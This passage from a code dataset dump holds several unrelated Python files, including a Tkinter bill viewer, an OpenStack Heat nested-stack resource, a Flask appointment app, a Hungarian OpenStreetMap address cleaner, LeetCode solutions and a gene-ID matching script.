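In the credit-default record above, the POST handler logs 'aged' twice; the second print was presumably meant to log 'loa'. A compact sketch of the intended prediction step — the model path "CRE" and the 2-D input shape come from the record, while the scalar extraction is an assumption about the desired output:

import joblib

def predict_default(income, age, loan, model_path="CRE"):
    model = joblib.load(model_path)
    pred = model.predict([[income, age, loan]])  # predict() expects a 2-D array
    return int(pred[0])  # single row in, single label out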
text=head_words[0], width=10)\n year_header.pack(side=\"left\")\n\n summary_header = tk.Label(header, text=head_words[1], width=10)\n summary_header.pack(side=\"left\")\n\n expenditure_header = tk.Label(header, text=head_words[2], width=15)\n expenditure_header.pack(side=\"left\")\n\n income_header = tk.Label(header, text=head_words[3], width=15)\n income_header.pack(side=\"left\")\n\n transfer_header = tk.Label(header, text=head_words[4], width=20)\n transfer_header.pack(side=\"left\")\n \n all_transfer_header = tk.Label(header, text=head_words[5], width=20)\n all_transfer_header.pack(side=\"left\")\n\n details_header = tk.Label(header, text=head_words[6], width=10)\n details_header.pack(side=\"right\")\n \n details_header = tk.Label(header, text=head_words[7], width=10)\n details_header.pack(side=\"right\")\n\n # 分割线\n separator = tk.Frame(yearly_summary, height=2, bd=1, relief=\"sunken\")\n separator.pack(fill=\"x\", padx=5, pady=5)\n\n for month, summary, expenditure_count, income_count, transfer_count, all_transfer_count in months:\n month_row = tk.Frame(yearly_summary)\n month_row.pack(side=\"top\", fill=\"x\")\n\n month_label = tk.Label(month_row, text=month, width=10)\n month_label.pack(side=\"left\")\n\n summary_label = tk.Label(month_row, text=str(f\"{summary:.2f}\"), width=10)\n summary_label.pack(side=\"left\")\n\n expenditure_label = tk.Label(month_row, text=str(expenditure_count), width=15)\n expenditure_label.pack(side=\"left\")\n\n income_label = tk.Label(month_row, text=str(income_count), width=15)\n income_label.pack(side=\"left\")\n\n transfer_label = tk.Label(month_row, text=str(transfer_count), width=20)\n transfer_label.pack(side=\"left\")\n \n transfer_label = tk.Label(month_row, text=str(all_transfer_count), width=20)\n transfer_label.pack(side=\"left\")\n\n month_button = tk.Button(month_row, text=\"详细\", command=lambda y=year, m=month: create_grandet_bills_window_by_month(y, m), width=10, bg = \"blue\")\n month_button.pack(side=\"right\")\n \n target_transactions = ExtractTransactions.extract_by_year_month(year=year, month=month)\n title = f\"{str(year)}年-{str(month)}月 账单详情\"\n details_button = tk.Button(month_row, text=\"分析\", command=lambda ts=target_transactions, t=title: show_detail_page(ts, t), width=10, bg = \"purple\")\n details_button.pack(side=\"right\")\n\n return yearly_summary\n \n \ndef show_details(root: tk.Tk, year: str):\n \n details_window = tk.Toplevel(root)\n details_window.title(f\"{year} 账单详情\")\n details_label = tk.Label(details_window, text=f\"这里是 {year} 年的账单详情\")\n details_label.pack()\n\n\ndef get_data_by_year(year: int) -> tuple:\n \n files = []\n years = []\n print_log(f\"get {str(year)} year transactions\")\n every_years_transactions = get_value(\"every_years_transactions\")\n if every_years_transactions is None:\n print_log(f\"get every_years_transactions error.\")\n # 账单文件\n files = [\"账单1\", \"账单2\", \"账单3\"]\n years = [(\"1\", 1000, 10, 5, 3, 18),\n (\"2\", 2000, 15, 8, 4, 27),\n (\"3\", 3000, 20, 10, 5, 35)]\n else:\n year_transaction = every_years_transactions.get(str(year))\n \n \n if year_transaction is not None:\n \n print_log(f\"get every_years_transactions success.\")\n all_files = get_value(\"bills_files\")\n files = []\n for item in all_files:\n files.append(os.path.basename(item))\n \n years = []\n month_transactions = []\n if isinstance(year_transaction, YearsTransaction):\n month_transactions = year_transaction.to_MonthsTransaction()\n \n for month_transaction_item in month_transactions.keys(): \n month_transaction = 
month_transactions.get(month_transaction_item)\n if isinstance(month_transaction, MonthsTransaction):\n month = month_transaction.month\n all_number = TransactionsTools.get_transactions_size(month_transaction)\n summary = round(sum(TransactionsTools.get_amounts(month_transaction)), 3)\n expenditure_count = TransactionsTools.get_summary_count(month_transaction)\n income_count = TransactionsTools.get_income_count(month_transaction)\n transfer_count = TransactionsTools.get_transfer_count(month_transaction)\n \n years.append((month, summary, expenditure_count, income_count, transfer_count, all_number))\n else:\n continue\n else:\n print_log(f\"get every months transactions error.\")\n return (files, years)\n\n\ndef create_grandet_bills_window_by_year(year: int):\n \n # 标题\n title = f\"葛朗台{str(year)}年的账单\"\n # 表头\n head_words = [\"月份\", \"花销总额\", \"支出交易笔数\", \"收入交易笔数\", \"个人转账交易笔数\", \"交易总笔数\", \"分析\", \"详情\"]\n files, months = get_data_by_year(year)\n\n root = tk.Tk()\n root.geometry(\"1600x720\") # 设置窗口大小\n root.title(title)\n bill_frame = tk.Frame(root, width=150) # 设置列表框架宽度为窗口宽度的1/4\n yearly_summary = tk.Frame(root, width=600)\n \n # bill_frame = fill_bill_files(bill_frame=bill_frame, file_names=files)\n \n yearly_summary = fill_bill_information(yearly_summary=yearly_summary,\n root=root,\n head_words=head_words,\n months=months,\n year=year)\n \n\n years_lable = []\n expenditure_counts = []\n income_counts = []\n transfer_counts = []\n all_transfer_counts = []\n \n for month, summary, expenditure_count, income_count, transfer_count, all_transfer_count in months:\n \n years_lable.append(month)\n expenditure_counts.append(expenditure_count)\n income_counts.append(income_count)\n transfer_counts.append(transfer_count)\n all_transfer_counts.append(all_transfer_count)\n \n print(expenditure_counts)\n print(income_counts)\n print(transfer_counts)\n print(all_transfer_counts)\n\n # 创建matplotlib图像并在Tkinter窗口中嵌入它\n fig = Figure(figsize=(5, 4), dpi=100)\n ax = fig.add_subplot(111)\n # 数据\n N = len(years_lable)\n ind = np.arange(N) # x 轴的位置\n width = 0.15 # 柱子的宽度\n rects1 = ax.bar(ind, tuple(expenditure_counts), width, label='expend')\n rects2 = ax.bar(ind + width, tuple(income_counts), width, label='income')\n rects3 = ax.bar(ind + width * 2, tuple(transfer_counts), width, label='self')\n rects3 = ax.bar(ind + width * 3, tuple(all_transfer_counts), width, label='all')\n \n # 添加文本标签和标题\n # ax.set_ylabel('Scores')\n # ax.set_title('Scores by group and gender')\n ax.set_xticks(ind)\n ax.set_xticklabels(tuple(years_lable))\n ax.legend()\n\n canvas = FigureCanvasTkAgg(fig, master=yearly_summary)\n canvas.draw()\n canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n root.mainloop()\n","repo_name":"Light-Blue-Cross/Grandet","sub_path":"src/gui/ui/year_transaction.py","file_name":"year_transaction.py","file_ext":"py","file_size_in_byte":9553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7130066787","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom requests import exceptions\n\nfrom heat.common import exception\nfrom heat.common import template_format\nfrom heat.common import urlfetch\nfrom heat.engine.properties import Properties\nfrom heat.engine import stack_resource\n\nfrom heat.openstack.common import log as logging\n\nlogger = logging.getLogger(__name__)\n\n\n(PROP_TEMPLATE_URL,\n PROP_TIMEOUT_MINS,\n PROP_PARAMETERS) = ('TemplateURL', 'TimeoutInMinutes', 'Parameters')\n\n\nclass NestedStack(stack_resource.StackResource):\n '''\n A Resource representing a child stack to allow composition of templates.\n '''\n\n properties_schema = {\n PROP_TEMPLATE_URL: {\n 'Type': 'String',\n 'Required': True,\n 'Description': _('The URL of a template that specifies the stack'\n ' to be created as a resource.')},\n PROP_TIMEOUT_MINS: {\n 'Type': 'Number',\n 'Description': _('The length of time, in minutes, to wait for the'\n ' nested stack creation.')},\n PROP_PARAMETERS: {\n 'Type': 'Map',\n 'Description': _('The set of parameters passed to this nested'\n ' stack.')}}\n\n update_allowed_keys = ('Properties',)\n update_allowed_properties = (PROP_TEMPLATE_URL, PROP_TIMEOUT_MINS,\n PROP_PARAMETERS)\n\n def handle_create(self):\n try:\n template_data = urlfetch.get(self.properties[PROP_TEMPLATE_URL])\n except (exceptions.RequestException, IOError) as r_exc:\n raise ValueError(\"Could not fetch remote template '%s': %s\" %\n (self.properties[PROP_TEMPLATE_URL], str(r_exc)))\n\n template = template_format.parse(template_data)\n\n return self.create_with_template(template,\n self.properties[PROP_PARAMETERS],\n self.properties[PROP_TIMEOUT_MINS])\n\n def handle_delete(self):\n return self.delete_nested()\n\n def FnGetAtt(self, key):\n if key and not key.startswith('Outputs.'):\n raise exception.InvalidTemplateAttribute(resource=self.name,\n key=key)\n return self.get_output(key.partition('.')[-1])\n\n def FnGetRefId(self):\n return self.nested().identifier().arn()\n\n def handle_update(self, json_snippet, tmpl_diff, prop_diff):\n # Nested stack template may be changed even if the prop_diff is empty.\n self.properties = Properties(self.properties_schema,\n json_snippet.get('Properties', {}),\n self.stack.resolve_runtime_data,\n self.name)\n\n try:\n template_data = urlfetch.get(self.properties[PROP_TEMPLATE_URL])\n except (exceptions.RequestException, IOError) as r_exc:\n raise ValueError(\"Could not fetch remote template '%s': %s\" %\n (self.properties[PROP_TEMPLATE_URL], str(r_exc)))\n\n template = template_format.parse(template_data)\n\n return self.update_with_template(template,\n self.properties[PROP_PARAMETERS],\n self.properties[PROP_TIMEOUT_MINS])\n\n\ndef resource_mapping():\n return {\n 'AWS::CloudFormation::Stack': NestedStack,\n }\n","repo_name":"rickerc/heat_audit","sub_path":"heat/engine/resources/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70081146712","text":"if pyautogui.pixelMatchesColor(round(1980 * r), round(180 * r), (19, 7, 6), tolerance=2) or pyautogui.pixelMatchesColor(round(1980 * r), round(180 * r), (196, 78, 67), tolerance=50):\n update_status(\"Fighting!\")\n pyautogui.keyDown(\"q\")\n time.sleep(0.1)\n pyautogui.keyUp(\"q\")\n time.sleep(0.1)\n pyautogui.keyDown(\"a\")\n time.sleep(0.02)\n pyautogui.keyUp(\"a\")\n time.sleep(0.1)\n pyautogui.keyDown(\"d\")\n 
time.sleep(0.02)\n pyautogui.keyUp(\"d\")\n time.sleep(0.1)\n pyautogui.keyDown(\"g\")\n time.sleep(0.1)\n pyautogui.keyUp(\"g\")\n time.sleep(0.3)\n pyautogui.click()\n for _ in range(5):\n pyautogui.keyDown(\"p\")\n time.sleep(0.02)\n pyautogui.keyUp(\"p\")\n time.sleep(0.5)\n\n# elif pyautogui.pixelMatchesColor(round(3250*r), round(200*r), (169, 6, 17), tolerance=20):\nelse:\n update_status(\"Matching!\")\n time.sleep(0.5)\n pyautogui.click(x=round(2371 * r), y=round(1648 * r))\n time.sleep(2)\n pyautogui.click(x=round(2080 * r), y=round(300 * r))\n time.sleep(2)\n pyautogui.click(x=round(1920 * r), y=round(1620 * r))\n time.sleep(2)\n pyautogui.click(x=round(3600 * r), y=round(1800 * r))\n time.sleep(2)\n","repo_name":"zhlzhl123/auto","sub_path":"destiny/hunzhan.py","file_name":"hunzhan.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6070120613","text":"class HitCounter:\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self._timeline = []\n\n def hit(self, timestamp: int) -> None:\n \"\"\"\n Record a hit.\n @param timestamp - The current timestamp (in seconds granularity).\n \"\"\"\n self._timeline.append(timestamp)\n\n def getHits(self, timestamp: int) -> int:\n \"\"\"\n Return the number of hits in the past 5 minutes.\n @param timestamp - The current timestamp (in seconds granularity).\n \"\"\"\n bound = timestamp - 300\n lo, hi = 0, len(self._timeline)\n while lo < hi:\n mid = lo + (hi - lo) // 2\n if self._timeline[mid] <= bound:\n lo = mid + 1\n else:\n hi = mid\n\n return len(self._timeline) - lo\n\n\n# Your HitCounter object will be instantiated and called as such:\n# obj = HitCounter()\n# obj.hit(timestamp)\n# param_2 = obj.getHits(timestamp)","repo_name":"mingaki/leetcode","sub_path":"362.design-hit-counter.py","file_name":"362.design-hit-counter.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36252897082","text":"class Solution:\n def isPalindrome(self, A: str) -> bool:\n A = A.lower()\n LL = []\n for i in A:\n if i.isalnum():\n LL.append(i)\n LLR = list(reversed(LL))\n if LL != LLR:\n return False\n return True\n","repo_name":"impiyush83/code","sub_path":"leetcode/125-valid-palindrome.py","file_name":"125-valid-palindrome.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"36015254508","text":"from datetime import date\n\nimport jsonrpclib\nfrom flask import Flask, redirect, render_template, request, session, url_for\nfrom markupsafe import escape\n\napp = Flask(__name__)\n\nclient = jsonrpclib.ServerProxy('http://0.0.0.0:8000/api')\n\n\n@app.template_filter('date_to_string')\ndef timestamp_to_datetime(datestring):\n return date.fromisoformat(datestring).strftime('%a, %B %-d, %Y')\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == \"GET\":\n return render_template(\"index.html\")\n params = dict(request.form)\n action = params.pop('action', None)\n owner = params.pop('owner', '')\n notes = params.pop('notes', None)\n admin = bool(params.pop('admin', False))\n appointments = []\n error = None\n\n try:\n if action == 'create-appointment':\n client.appointments.register(\n datestring=params['date'], owner=owner, notes=notes)\n except jsonrpclib.AppError as e:\n error = e.args[0][1]\n\n try:\n 
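The HitCounter record above hand-rolls a binary search over its timestamp list; the standard library's bisect module expresses the same lookup. An equivalent sketch (names are editorial):

import bisect

def hits_in_window(timeline, timestamp, window=300):
    # timeline is the append-only, sorted list of hit timestamps.
    lo = bisect.bisect_right(timeline, timestamp - window)
    return len(timeline) - lo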
appointments = client.appointments.list()\n if not admin:\n appointments = [\n appointment for appointment in appointments if appointment['owner'] == owner]\n\n if action == 'cancel-appointments':\n remove = []\n for i, appointment in enumerate(appointments):\n if params.get(str(appointment['date'])) == 'on':\n if admin or appointment['owner'] == owner:\n client.appointments.cancel(appointment['date'])\n remove.append(i)\n for i in reversed(remove):\n appointments.pop(i)\n except jsonrpclib.AppError as e:\n error = e.args[0][1]\n\n return render_template(\n \"index.html\",\n appointments=appointments,\n admin=admin,\n owner=owner,\n error=error)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", debug=True, port=5000)\n","repo_name":"Fireflyhealth-Recruiting/dev-ops-take-home","sub_path":"webserver/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71094849752","text":"import re\n\n\n# full replacements for keys\nKEY_MAP = {\n 'Street': 'addr:street',\n 'Telefon': 'phone',\n 'hrsz': 'addr:hrsz',\n 'postal_code': 'addr:postcode',\n 'hrsz': 'addr:hrsz',\n 'acess': 'access',\n 'architectq': 'architect',\n 'disusedhighway': 'disused:highway'\n}\n\n\n# full replacements for postcodes\nPOSTCODE_MAP = {\n '1130': '1131',\n '1231': '1213',\n '2128': '2821',\n '1519': '1111'\n}\n\n\n# full replacements for city names\nCITY_MAP = {\n u'Alcsutdoboz': u'Alcs\\xfatdoboz',\n u'1085': u'Budapest',\n u'budapest': u'Budapest',\n u'Budapest V': u'Budapest',\n u'Budapest,': u'Budapest',\n u'Budapeste': u'Budapest',\n u'hatvan': u'Hatvan',\n u'kisoroszi': u'Kisoroszi',\n u'nagyk\\xe1ta': u'Nagyk\\xe1ta',\n u'Pom\\ufffdz': u'Pom\\xe1z',\n u'\\xe9rd': u'\\xc9rd',\n u'\\u0150\\xe9cel': u'P\\xe9cel',\n u'v\\xe1c': u'V\\xe1c',\n u'S\\u0171lys\\xe1p': u'S\\xfclys\\xe1p',\n u'Ag\\xe1ed': u'G\\xe1rdony-Ag\\xe1rd',\n u'Ag\\xe1rd': u'G\\xe1rdony-Ag\\xe1rd',\n u'Agosty\\xe1n': u'Tata-Agosty\\xe1n',\n u'Torny\\xf3puszta': u'Tarj\\xe1n-Torny\\xf3puszta',\n u'Bikolpuszta': u'S\\xfctt\\u0151-Bikolpuszta',\n u'Dinny\\xe9s': u'G\\xe1rdony-Dinny\\xe9s',\n u'B\\xf6rzs\\xf6nyliget': u'Kismaros-B\\xf6rzs\\xf6nyliget',\n u'Domonyv\\xf6lgy': u'Domony-Domonyv\\xf6lgy',\n u'undefined': None\n}\n\n# partial replacements for street names\nSTREET_REPLACE_MAP = {\n u'krt.': u'k\\u00F6r\\u00FAt',\n u'Tere': u'tere',\n u'Park': u'park',\n u'\\u0171t': u'\\u00FAt',\n u'\\u00E9pcs\\u00F6': u'\\u00E9pcs\\u0151',\n u'uca': u'utca',\n u'u.': u'utca',\n u' u ': u'utca',\n u'Szz\\u00E1ll\\u00E1s': u'Sz\\u00E1ll\\u00E1s',\n u'p\\xe1lyaudvar': u'P\\xe1lyaudvar',\n u'Kereng\\u0151': u'kereng\\u0151',\n u'\\u00FAtca': u'utca'\n}\n\n\n# full replacements for street names\nSTREET_MAP = {\n u'Gy\\u00F6rgyutca': u'Gy\\u00F6rgy utca',\n u'Palota-kert': u'Palotakert',\n u'Mariav\\u00F6lgy': u'M\\u00E1riav\\u00F6lgy',\n u'\\xdajbuda K\\xf6zpont': u'\\xdajbuda-k\\xf6zpont',\n u'Vaci ut': u'V\\xe1ci \\xfat',\n u'M\\xe1ramaros ut': u'M\\xe1ramaros \\xfat',\n u'D\\xf3zsa Gy\\xf6rgyutca': u'D\\xf3zsa Gy\\xf6rgy utca',\n u'Bev\\xe1s\\xe1rl\\xf3utca2': u'Bev\\xe1s\\xe1rl\\xf3 utca 2',\n u'Stef\\xe1nia ut': u'Stef\\xe1nia \\xfat',\n u'Z\\xf6ldfa utca (XXII ker\\xfclet)': u'Z\\xf6ldfa utca (XXII. 
ker\\xfclet)'\n}\n\n\n# identify Slovakian postcodes\nre_postcode_slovakian = re.compile(r'^\\d{3}\\s\\d{2}$')\nre_postcode_slovakian_invalid = re.compile(r'^\\d{5}$')\n\n\n# use to identify typographical number values\nre_hrsz = re.compile(r'hrsz', re.I)\n\n\n# use to clean house number values\nre_housenumber = [\n\n # '12/A fsz.' -> '12/A/1' (fsz. = ground floor)\n (re.compile(r'\\s+FSZ\\.'), '/1/'),\n\n # '123.' -> '123'\n (re.compile(r'\\.'), ''),\n\n # '12/B ??' -> '12/B',\n (re.compile(r'\\?'), ''),\n\n # '26;33' -> '26,33'\n (re.compile(r'\\;'), ','),\n\n # '10, 12, 14' -> '10,12,14'\n (re.compile(r',\\s+'), ','),\n\n # '1 / A - 3 / C' -> '1/A-3/C'\n (re.compile(r'\\s+([\\/\\-])\\s+'), r'\\1'),\n\n # '4/' -> '4'\n # '13-' -> '13'\n (re.compile(r'[\\/\\-]$'), ''),\n\n # '16 A' -> '16/A'\n (re.compile(r'(\\d)\\s+([A-Z]{1})'), r'\\1/\\2'),\n\n # '100A-100B' -> '100/A-100/B'\n (re.compile(r'(\\d)([A-Z])'), r'\\1/\\2')\n]\n\n\n# full replacements for house numbers\nHOUSENUMBER_MAP = {\n # fix issue caused by str.upper\n u'19/KM PIHEN\\u0150': u'19/km pihen\\u0151'\n}\n\n\n# understand as: COLUMN_SHIFT_MAP[key_from][value_from][key_to] = value_to\nCOLUMN_SHIFT_MAP = {\n\n # cloumn shift issues in house numbers\n 'housenumber': {\n '0135/36': {\n 'hrsz': '0135/36'\n },\n '0152': {\n 'hrsz': '0152'\n },\n '019/8 hrsz': {\n 'hrsz': '019/8'\n },\n '0192/34': {\n 'hrsz': '0192/34'\n },\n '06/79': {\n 'hrsz': '06/79'\n },\n '081/15 hrsz': {\n 'hrsz': '081/15'\n },\n '15/7 hrsz': {\n 'hrsz': '15/7'\n }\n },\n\n # column shift issues in streets\n 'street': {\n\n u'Szent Istv\\xe1n k\\xf6r\\xfat 13': {\n 'street': u'Szent Istv\\xe1n k\\xf6r\\xfat',\n 'housenumber': '13'\n },\n\n u'V\\xe1ci \\xfat 46/B': {\n 'street': u'V\\xe1ci \\xfat ',\n 'housenumber': '46/B'\n },\n\n u'V\\xe1ci \\xfat 46/B.': {\n 'street': u'V\\xe1ci \\xfat',\n 'housenumber': '46/B'\n },\n\n u'Gy\\xf6ngyvir\\xe1g utca (L\\xf3nyaytelep) 8': {\n 'street': u'Gy\\xf6ngyvir\\xe1g utca',\n 'housenumber': '8'\n },\n\n u'Vak Botty\\xe1n utca 75/a': {\n 'street': u'Vak Botty\\xe1n utca',\n 'housenumber': '75/a'\n },\n\n u'Dob utca 55': {\n 'street': u'Dob utca',\n 'housenumber': '55'\n },\n\n u'Bev\\xe1s\\xe1rl\\xf3 utca 2': {\n 'street': u'Bev\\xe1s\\xe1rl\\xf3 utca',\n 'housenumber': '2'\n },\n\n u'Liszenk\\xf3 telep 0318 hrsz.': {\n 'street': u'Liszenk\\xf3 telep',\n 'hrsz': '0318'\n },\n\n u'K\\xfclter\\xfclet 0195/18 hrsz': {\n 'street': u'K\\xfclter\\xfclet',\n 'hrsz': '0195/18'\n }\n }\n}\n\n\ndef clean_key(key, key_map=KEY_MAP):\n \"\"\" Clean a key. \"\"\"\n key = key.replace('.', ':')\n if key in key_map:\n return key_map[key]\n return key\n\n\ndef clean_postcode(postcode, postcode_map=POSTCODE_MAP):\n \"\"\" Clean a postcode. \"\"\"\n if re_postcode_slovakian.search(postcode) is not None:\n return postcode\n if re_postcode_slovakian_invalid.search(postcode) is not None:\n return '{0} {1}'.format(postcode[:3], postcode[3:])\n if postcode in postcode_map:\n return postcode_map[postcode]\n return postcode\n\n\ndef clean_city(city, city_map=CITY_MAP):\n \"\"\" Clean a city name. \"\"\"\n city = city.replace(' - ', '-')\n if city in city_map:\n return city_map[city]\n return city\n\n\ndef clean_street(street,\n street_replace_map=STREET_REPLACE_MAP,\n street_map=STREET_MAP):\n \"\"\" Clean a street name. 
\"\"\"\n for key in street_replace_map.keys():\n if key in street:\n street = street.replace(key, street_replace_map[key])\n if street in street_map:\n street = street_map[street]\n return street[0].capitalize() + street[1:]\n\n\ndef clean_state(state):\n \"\"\" Clean a state name. \"\"\"\n return state.title()\n\n\ndef clean_housenumber(housenumber, housenumber_map=HOUSENUMBER_MAP):\n \"\"\" Clean a house number. \"\"\"\n # do not clean typographical numbers\n if re_hrsz.search(housenumber) is not None:\n return housenumber\n # standardize characters to uppercase\n housenumber = housenumber.upper()\n # replace UNICODE minus sign with dash symbol\n housenumber = housenumber.replace(u'\\u2013', '-')\n # standardize format\n for pattern, replacement in re_housenumber:\n if pattern.search(housenumber) is not None:\n housenumber = pattern.sub(replacement, housenumber)\n housenumber = housenumber.strip()\n if housenumber in housenumber_map:\n return housenumber_map[housenumber]\n return housenumber\n\n\ndef clean_value(key, value):\n \"\"\" Clean a key and a value. \"\"\"\n key = clean_key(key)\n if key == 'addr:postcode':\n value = clean_postcode(value)\n if key == 'addr:city':\n value = clean_city(value)\n if key == 'addr:street':\n value = clean_street(value)\n if key == 'addr:state':\n value = clean_state(value)\n if key == 'addr:housenumber':\n value = clean_housenumber(value)\n return key, value\n\n\ndef clean_address(address):\n \"\"\" Clean an address, fix column shift errors. \"\"\"\n for key_from in COLUMN_SHIFT_MAP.keys():\n if key_from in address:\n value_from = address[key_from]\n if value_from in COLUMN_SHIFT_MAP[key_from]:\n values_to = COLUMN_SHIFT_MAP[key_from][value_from]\n keys_to = values_to.keys()\n # update keys\n for key_to in keys_to:\n address[key_to] = values_to[key_to]\n # delete the original key if it has not been updated\n if key_from not in keys_to:\n del address[key_from]\n return address\n","repo_name":"gaborsar/udacity-data-analyst-nanodegree-p3","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":8262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2099188442","text":"import os\nimport time\n\nfrom gym_scalable.envs.grid.maps import map_loader\nfrom gym_scalable.envs.grid.multi_chaser_evader_env import GridChaserVsEvaderEnv\n\nprint(os.getcwd())\nenv = GridChaserVsEvaderEnv(\n config={\"mapfile\": map_loader.get_8x8_map(), \"RL_evader\": False, \"full_state\": False, \"normalize_state\": True})\n\nstate = env.reset()\ni = 0\ngoal = env.grid.goal\n\nwhile True:\n i += 1\n env.render()\n\n action1 = env.action_space.sample()\n action2 = env.action_space.sample()\n\n state, reward, done, _ = env.step(actions={\"evader\": action1, \"chaser\": action2})\n\n print(f\"state : {state}\")\n print(f\"reward : {reward}\")\n print(f\"done : {done}\")\n\n # print(env.normalize_state)\n if (done[\"__all__\"]):\n env.reset()\n\n # input()\n time.sleep(0.1)\n","repo_name":"kinseyreeves/Deep-RL-Baselines","sub_path":"Testing/env_testers/test_multi_chaser_vs_evader.py","file_name":"test_multi_chaser_vs_evader.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"10943287050","text":"#Get mgi ids of genes from MGI, Ensemble and Uniprot databases as these databases may contain MGI ids of different gene names.\n#input: \n#\tmerged_gene_protein_features_with_ids_missing_vals.csv (contain gene 
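Stepping back to the address-cleaning record that closes above: its regex pipeline is easiest to verify with a few worked inputs. The expected outputs below follow directly from the record's own rules; this assumes the module's functions are importable, and the sample values are illustrative:

assert clean_postcode('94101') == '941 01'    # 5-digit Slovakian form gets its space
assert clean_housenumber('16 A') == '16/A'    # digit + letter joined with a slash
assert clean_housenumber('10, 12, 14') == '10,12,14'
assert clean_street(u'Kossuth u.') == u'Kossuth utca'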
names of the genes)\n#\tgenenames_mgiids_from_mgi.txt (downloaded from MGI)\n#\tgenenames_mgiids_from_ensemble.txt (downloaded from Ensemble)\n#\tgenenames_mgiids_from_uniprot.txt (downloaded from Uniprot)\n#output: a csv file containing gene names and their MGI ids\n#\n#format of genenames_mgiids_from_mgi.txt\n#\n#Input\tInput Type\tMGI Gene/Marker ID\tSymbol\tName\tFeature Type\n#Plekhg2\tcurrent symbol\tMGI:2141874\tPlekhg2\tpleckstrin homology domain containing, family G (with RhoGef domain) member 2\tprotein coding gene\n#1700006E09Rik\tcurrent symbol\tMGI:1922687\t1700006E09Rik\tRIKEN cDNA 1700006E09 gene\tprotein coding gene\n#Cers4\tcurrent symbol\tMGI:1914510\tCers4\tceramide synthase 4\tprotein coding gene\n#Cers5\tcurrent symbol\tMGI:1919199\tCers5\tceramide synthase 5\tprotein coding gene\n#Cers5\thuman synonym\tMGI:2442564\tCers6\tceramide synthase 6\tprotein coding gene\n#\n#format of genenames_mgiids_from_ensemble.txt\n#\n#MGI symbol,MGI ID\n#mt-Nd1,MGI:101787\n#mt-Nd2,MGI:102500\n#mt-Co1,MGI:102504\n#mt-Co2,MGI:102503\n#mt-Atp8,MGI:99926\n#\n#format of genenames_mgiids_from_uniprot.txt\n#\n#ID D3YY99_MOUSE Unreviewed; 205 AA.\n#AC D3YY99;\n#DT 20-APR-2010, integrated into UniProtKB/TrEMBL.\n#DT 20-APR-2010, sequence version 1.\n#DT 24-JUN-2015, entry version 35.\n#DE SubName: Full=Pleckstrin homology domain-containing family G member 2 {ECO:0000313|Ensembl:ENSMUSP00000118217};\n#DE Flags: Fragment;\n#...\n#DR MGI; MGI:2141874; Plekhg2.\n#\n#note: if a gene name has no MGI id in MGI, Ensemble and Uniprot, its MGI id is 'none' for the MGI_ID feature.\n\nimport sys\nimport re\n\ndef main():\n\tinfile ='/home/david/Dropbox/datasets/essential genes prediction/unknown essentiality genes/103 features data/merged_gene_protein_features_with_ids_missing_vals_non-mouse_genes_removed_and_duplicates_removed.csv'\n\tinfile2='/home/david/Dropbox/datasets/essential genes prediction/unknown essentiality genes/genenames_mgiids_from_mgi.txt'\n\tinfile3='/home/david/Dropbox/datasets/essential genes prediction/unknown essentiality genes/genenames_mgiids_from_ensemble.txt'\n\tinfile4 = '/home/david/Dropbox/datasets/essential genes prediction/unknown essentiality genes/genenames_mgiids_from_uniprot.txt'\n\toutfile = '/home/david/Dropbox/datasets/essential genes prediction/unknown essentiality genes/genenames_mgiids.csv'\n\n\tinfileL = [line.strip() for line in open(infile)]\n\n\tif len(infileL)==0:\n\t\tprint(infile+\" is empty.\")\n\t\tsys.exit(-1)\n\n\tinfile2L = [line.strip() for line in open(infile2)]\n\n\tif len(infile2L)==0:\n\t\tprint(infile2+\" is empty.\")\n\t\tsys.exit(-1)\n\t\n\tinfile3L = [line.strip() for line in open(infile3)]\n\n\tif len(infile3L)==0:\n\t\tprint(infile3+\" is empty.\")\n\t\tsys.exit(-1)\n\n\tinfile4L = [line.strip() for line in open(infile4)]\n\n\tif len(infile4L)==0:\n\t\tprint(infile4+\" is empty.\")\n\t\tsys.exit(-1)\n\n\thash_mgiids_infile = {}\n\thash_mgiids_infile2 = {}\n\thash_mgiids_infile3 = {}\n\thash_mgiids_infile4 = {}\n\tfor line in infile2L[1:len(infile2L)]:\n\t\tvals = line.split('\\t')\n\t\tgenename = vals[0]\n\t\tgenename = genename.lower()\n\t\tinput_type = vals[1]\n\t\tif input_type == 'current symbol' or input_type == 'old symbol' or input_type == 'synonym' or input_type == 'related synonym':\n\t\t\tmgiid = vals[2]\n\t\t\tif hash_mgiids_infile.get(genename) == None:\n\t\t\t\tif mgiid != '':\n\t\t\t\t\thash_mgiids_infile[genename] = mgiid\n\t\t#\telse:\n\t\t#\t\tprint(genename+' in '+infile2+' has more than one MGI id. 
